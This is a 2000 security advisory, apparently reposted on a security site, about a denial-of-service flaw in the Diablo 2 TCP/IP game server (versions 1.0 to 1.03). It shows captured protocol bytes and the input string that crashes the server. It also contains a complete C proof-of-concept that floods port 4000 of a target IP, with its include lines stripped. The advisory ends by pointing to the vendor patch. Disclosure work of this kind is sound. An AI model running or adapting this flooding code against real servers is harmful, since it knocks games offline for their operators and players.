Advisories : Diablo 2 TCP/IP Sever DoS

main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
discussions
- read forum
- new topic
- search
meetings
- meetings list
- recent additions
- add your info
top 100 sites
- visit top sites
- sign up now
- members
webmasters
- add your url
- add domain
- search box
- link to us
projects
- our projects
- free email
m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : Diablo 2 TCP/IP Sever DoS
Title:	Diablo 2 TCP/IP Sever DoS
Released by:	Secpoint
Date:	21st August 2000
Printable version:	Click here
      Security Point

    info@secpoint.com

 http://www.secpoint.com/



Advisory #002

Title: Diablo 2 TCP/IP Sever DoS

Date: 21-08-00





  		Copyright (c) 2000 SECURITY POINT



Contents:

=========



	I	Disclaimer

	II	Introduction

	III	Description

        IV      Demonstration code

	V	Fix

	VI	Contact

        VII     Job Offers

	VIII    Greetings



I - Disclaimer:

===============



This paper is for educational purpose only, Security Point will not be

responsible for any damages whatsoever that have a connection with the

information written in this paper. There are no warranties with regard

to this information, any use of this information is at the user's own risk.



II - Introduction:

==================



We have found a vulnerability in Diablo 2 TCP/IP Server running on port 4000.

If some malformed data is being send to port 4000 while running it will result 

in the game crashing. Though windows will NOT crash with it.



III - Description:

==================



While playing around with Diablo2 on port 4000, I discovered some 

problems with the TCP/IP Server. When a TCP/IP game in D2 was running, and 

connected to port 4000, then sent some info, it came with a "Diablo II Server 

Error".

Anyway, this bug turned out to be irregular.



So i began to explore the D2 TCP/IP Server some more. Then while listing on

port 4000 with a program, and trying to create a game, I discovered that D2

sends the following data, to the port if its occupied:



RAW:

>`

>f‚?g

>eÿ§

>

>

>eÿ§

>

>

>eÿ§

>

>lûJM

>eª§

>è#+ê:Í»ÞùJM

ASCII codes:

>96-0-169-5-24-121-169-5-216-9-0-0-7-2-0-0-176-1-3-0-0-71-114-89-112-72-111-78-45-68-75-0-0-0-0-0-52-0-0-4-0-0-0-0-0

>102-135-234-40-0-0-0-0-0

>101-255-167-3-0-0-85-170-85-170-71-0-0-0-71-114-89-112-72-111-78-45-68-75-0-0-0-0-0-0-0-0-0-0-221-0-16-0-130-0-3-0-1-0-255-255-255-255-255-48-255-27-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-0-255-0-255-0-255-0-255-0-255-0-255-0-255-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0

>0-0-0-0-0-104-110-69-50-87-111-111-33-6-0-0-0-42-1-1-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0

>0-0-0-0-0-0-0-12

>101-255-167-3-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0

>0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-87-83-1-0-0-0-80-0-2-1-1-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-2-1-1-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-2-1-1-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0

>0-0-0-0-0-1-119-12

>101-255-167-3-0-0-52-0-4-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-103-102-207-127-0-25-0-0-0-15-0-0-0-20-0-0-0-25-0-0-0-0-55-0-0-0-55-0-0-0-15-0-0-0-15-0-0-0-89-0-0-0-89-0-0-1-0-0-0-101-1-0-0-77-0-0-0-105-102-0-0-0-0-0-0-0-0-0-0-0-0

>0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-74-77-10-0-74-77-16-0-2-0-0-1-160-149-4-0-0-0-0-0-0-40-201-109-188-122-114-254-176-249-7-74-77-16-0-2-0-0-1-160-149-4-0-0-0-0-2-0-200-27-143-165-24-197-31-154-251-7-74-77-16-0-2-0-0-1-160-149-4-0-0-0-0-4-0-104-110-176-142-186-23-65-131-249-7-74-77-16-0-2-0-0-1-160-149-4-0-0-0-0-6-0-8-193-209-119-88-106-98

>108-251-7-74-77-16-0-12

>101-170-167-3-0-0-2-0-0-1-0-18-4-0-0-0-0-210-0-168-19-243-96-250-188-131-85-1-0-74-77-16-0-2-0-0-1-16-18-4-0-0-0-0-146-0-72-102-20-74-152-15-165-62-3-0-74-77-16-0-0-0-0-1-32-17-4-0-0-0-0-82-0-40-92-197-216-93-127-50-249-4-0-74-77-16-0-0-0-8-1-80-77-4-0-0-12-24-0-0-112-127-12-188-99-44-157-92-248-7-74-77-16-0-2-0-4-1-144-65-4-0-0-46-48-0-0

>232-35-43-234-58-205-187-222-249-7-74-77-16-0-2-0-5-1-80-76-4-0-0-24-24-0-0-136-118-76-211-216-31-221-199-251-7-74-77-0-0-74-77-0-0-0-0-0-0-74



(without the ">"'s, ascii code separated by "-")



Maybe this can be some sort of shutdown message, that D2 sends if the server

wasn't shut down properly? In this data there where 3 eÿ§'s, so I started

testing how the D2 TCP/IP Server would respond if I sent some of them. At

first there wasn't much respond from the server, but if i sendt:



eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§\n



some (5-10) times in a row, it would come with the following message:



---------------------------------------------------------------------------

- Diablo II Server Error                                                -X-

---------------------------------------------------------------------------

-  /\   Assertion Failure                                                 -

- /  \  Location: C:\D2\Source\Fog\Src\QServer\Qserver98.cpp, line #272   -

-/____\ Expression: nSize >= 0 && nSize < READ_BUFFER_SIZE                -

-                            ---------------                              -

-                            -     OK      -                              -

-                            ---------------                              -

---------------------------------------------------------------------------



When you click OK it would crash diablo2. Then I tried with much more

eÿ§'s, that resolved in that i only had to send something 1 time. If I

tried with a lot of eg. A's then it wouldn't crash, but if I tried with one

of the other "commands" then it would also respond with the error.



IV - Demonstration code

=======================

/*

 * SPD2-DoS.c

 *

 * SECURITY POINT -- http://www.secpoint.com

 *

 * (C) COPYRIGHT SECURITY POINT 2000

 * All Rights Reserved

 *

 * This source code is for educational purpose ONLY, Security Point will not 

 * be responsible for any damages whatsoever that have a connection with this 

 * code. There are no warranties with regard to this information.  

 *

 * USE AT YOUR OWN RISK, BY USING THIS PROGRAM YOU ACCEPT ALL



 * RESPONSIBILITY FOR THE RESULTS



 *

 * For questions and suggestions email info@secpoint.com

 *

 * gcc SPD2-DoS.c -o SPD2-DoS

 *

 *

*/





#include 

#include 

#include 

#include 

#include 

#include 





#define OFFSET 10000



struct in_addr addr;

struct sockaddr_in address;

int d2_socket;

char sendbuffer[OFFSET];



main (int argc, char *argv[]) {

  printf("Diablo 2 TCP/IP Server DoS, by http://www.secpoint.com\n");

  if (argc != 2) {

    printf("Usage: %s ip\n", argv[0]);

    exit(0);

  }

  if ((d2_socket = socket(AF_INET, SOCK_STREAM,0)) < 0) {

    perror("socket");

    exit(0);

  }

  address.sin_family=AF_INET;

  address.sin_addr.s_addr = inet_addr(argv[1]);

  address.sin_port = htons(4000);

  if (connect(d2_socket, (struct sockaddr*)&address, sizeof(address)) < 0) {

    perror("connect");

    exit(0);

  }

  memset(sendbuffer, 0x60, sizeof(sendbuffer));

  while(1) {

  write(d2_socket, sendbuffer, strlen(sendbuffer));

  }

  close(d2_socket);

  printf("server killed\n");

}



V - Fix:

========

Vulnerable versions: Diablo 2 1.0, 1.01, 1.02, 1.03

Download the new patch from blizzard.com:

(http://www.blizzard.com/support/diablo2/information/patch.html)



VI - Contact:

=============



If you have further questions regarding this bug, then you can contact us at

www.secpoint.com

info@secpoint.com



VII - Job Offers:

=================

We are looking for people for: 

Penetration testing of Firewalls and TCP/IP based networks.

You must have a wide knowledge of TCP/IP protocols and applications, plus solid

technical experience of UNIX or Windows NT. 

The best candidate will have security experience in one or more of the 

following: 



ú Penetration testing. 

ú Linux and other network operating systems .

ú Web technologies: HTML, XML, JavaScript, Java, php, and asp.

ú Firewall, VPN and intrusion detection integration.

ú Routers, hubs, switches.





Finally, successful candidates must have the ability to take on responsibility

and work unsupervised in our offices and on customer sites. They must also be 

able to communicate their findings to client staff via written reports and 

presentations. 

Another important factor is that you have a CLEAN criminal record.



Send your CV to info@secpoint.com (in MS Word, PDF or plain text formats)



http://www.secpoint.com





VIII - Greetings:

=================

: SecurityFocus.com, ADM